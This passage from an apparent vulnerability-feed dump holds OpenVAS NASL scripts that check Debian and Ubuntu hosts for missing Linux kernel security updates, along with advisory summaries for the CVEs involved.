rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-all-s390x\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-amd64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-arm64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-armmp-lpae\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-common\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-ixp4xx\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-kirkwood\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2e\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-loongson-3\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-orion5x\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc-smp\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-powerpc64le\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-s390x\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.16.0-4-versatile\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-586\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-686-pae-dbg\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-amd64-dbg\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-arm64-dbg\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-armmp-lpae\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-ixp4xx\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-kirkwood\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2e\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-loongson-3\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-orion5x\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc-smp\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-powerpc64le\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-s390x-dbg\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.16.0-4-versatile\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-manual-3.16\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-source-3.16\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-support-3.16.0-4\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"xen-linux-system-3.16.0-4-amd64\", ver:\"3.16.36-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:35:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-14T00:00:00", "id": "OPENVAS:1361412562310842916", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842916", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-3097-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-ti-omap4 USN-3097-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842916\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-14 05:54:21 +0200 (Fri, 14 Oct 2016)\");\n script_cve_id(\"CVE-2016-6828\", \"CVE-2016-6136\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-3097-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-ti-omap4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Marco Grassi discovered a use-after-free\n condition could occur in the TCP retransmit queue handling code in the Linux\n kernel. A local attacker could use this to cause a denial of service (system\n crash) or possibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux-ti-omap4 on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3097-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3097-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-1489-omap4\", ver:\"3.2.0-1489.116\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:12", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310842907", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842907", "type": "openvas", "title": "Ubuntu Update for linux USN-3097-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux USN-3097-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842907\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 05:45:19 +0200 (Wed, 12 Oct 2016)\");\n script_cve_id(\"CVE-2016-6828\", \"CVE-2016-6136\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3097-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Marco Grassi discovered a use-after-free\n condition could occur in the TCP retransmit queue handling code in the Linux\n kernel. A local attacker could use this to cause a denial of service (system\n crash) or possibly execute arbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3097-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3097-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-generic\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-generic-pae\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-highbank\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-omap\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-powerpc-smp\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-powerpc64-smp\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-111-virtual\", ver:\"3.2.0-111.153\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2016-10-12T00:00:00", "id": "OPENVAS:1361412562310842912", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310842912", "type": "openvas", "title": "Ubuntu Update for linux-lts-trusty USN-3098-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ubuntu Update for linux-lts-trusty USN-3098-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.842912\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-10-12 05:45:40 +0200 (Wed, 12 Oct 2016)\");\n script_cve_id(\"CVE-2016-7039\", \"CVE-2016-6828\", \"CVE-2016-6136\", \"CVE-2016-6480\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-lts-trusty USN-3098-2\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-trusty'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"USN-3098-1 fixed vulnerabilities in the Linux\n kernel for Ubuntu 14.04 LTS. This update provides the corresponding updates for\n the Linux Hardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu\n12.04 LTS.\n\nVladimí r Beneš discovered an unbounded recursion in the VLAN and TEB\nGeneric Receive Offload (GRO) processing implementations in the Linux\nkernel, A remote attacker could use this to cause a stack corruption,\nleading to a denial of service (system crash). (CVE-2016-7039)\n\nMarco Grassi discovered a use-after-free condition could occur in the TCP\nretransmit queue handling code in the Linux kernel. A local attacker could\nuse this to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2016-6828)\n\nPengfei Wang discovered a race condition in the audit subsystem in the\nLinux kernel. A local attacker could use this to corrupt audit logs or\ndisrupt system-call auditing. (CVE-2016-6136)\n\nPengfei Wang discovered a race condition in the Adaptec AAC RAID controller\ndriver in the Linux kernel when handling ioctl()s. A local attacker could\nuse this to cause a denial of service (system crash). (CVE-2016-6480)\");\n script_tag(name:\"affected\", value:\"linux-lts-trusty on Ubuntu 12.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3098-2\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3098-2/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-generic\", ver:\"3.13.0-98.145~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-98-generic-lpae\", ver:\"3.13.0-98.145~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-6480", "CVE-2016-6136", "CVE-2016-6828", "CVE-2016-7039"], "description": "The 